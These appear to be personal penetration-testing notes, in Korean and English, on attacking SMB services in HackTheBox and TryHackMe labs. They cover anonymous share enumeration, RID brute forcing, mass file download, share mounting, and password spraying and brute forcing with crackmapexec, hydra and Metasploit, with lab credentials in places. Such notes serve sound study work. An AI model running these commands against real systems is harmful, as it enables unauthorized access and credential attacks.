139,445 - Pentesting SMB

Smb 열거 시 유저나 패스워드에 아무거나 입력해서라도 한번 확인하

┌───(root@kali-container-upgrade)-[~/tools/impacket]
└─# sudo python3 lookupsid.py thm.corp/guest:@10.10.171.244
#성
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at 10.10.171.244
[*] StringBinding ncacn_np:10.10.171.244[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1966530601-3185510712-10604624
498: THM\Enterprise Read-only Domain Controllers (SidTypeGrou

enum4linux -a 10.10.10.100 #-a : 모든 정보 가져오기 
smbmap -H 10.10.10.100 
smbclient //10.10.10.100/Replication -U ""%""  #-U는 사용자 인증 정보 지정 옵션 (유저 아이디 같은 것) but 여기서는 빈문자열 ""%""을 사용하여 익명으로 접속
smbmap -H 10.10.10.100 -r #공유가능한 폴더 재귀적으로 나열 
crackmapexec smb support.htb #호스트 이름과 도메인 표시 
crackmapexec smb support.htb --shares #공유가능한 폴더 모두 표시 
crackmapexec smb <target_ip_range> --shares -u '' -p ''

smbclient -N -L //support.htb #-N : 인증 없이, -L : 호스트의 공유 목록 표시
smbclient --no-pass //10.10.11.202/public #익명 로그인
smbclient ////10.10.11.202 -U sql_svc%REGGIE1234ronnie
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget * #이러면 각 공유에 있는 모든 파일 다운 가능
smb: \> get "SQL Server Procedures.pdf" /root/Downloads/HTB/machine/Escape/txt.txt
#파일 다운 명령어
#다운로드한 폴더에서 파일 찾는 명령어 
find smb-data-loot/ -type f

mount -t cifs //10.10.10.192/profiles$ /mnt #파일 마운트 명령어
#-t cifs: 마운트할 파일 시스템의 유형을 지정합니다. 여기서는 CIFS를 사용하므로 -t cifs로 지정합니다.
sudo umount ./blackfield/smb # unmount

#smb 익명 로그인
┌───(root@kali-container-upgrade)-[~/Downloads/HTB/machine/Reset]
└─# smbclient -N -L //10.10.171.244/Data

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.171.244 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌───(root@kali-container-upgrade)-[~/Downloads/HTB/machine/Reset]
└─# smbclient //10.10.171.244/Data -N 
Try "help" to get a list of possible commands.
smb: \> 

로컬 사용자 열거
임패킷

python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149

// SMB 명령어code
get <파일명> #파일 다운 명령어 
put <file name > #file upload command

비밀번호 스프레이

• 많은 사용자들에게 하나의 비밀번호를 대입하는 것

crackmapexec smb 10.10.10.169 -u users -p 'Welcome123!' --shares --continue-on-success

hydra -L user.list -P password.list smb://10.129.42.197

msf - smb_login 모듈 사용 

RID 열거

crackmapexec smb thm.corp -u uest -p '' --rid-brute

sudo python3 lookupsid.py guest:@10.10.171.244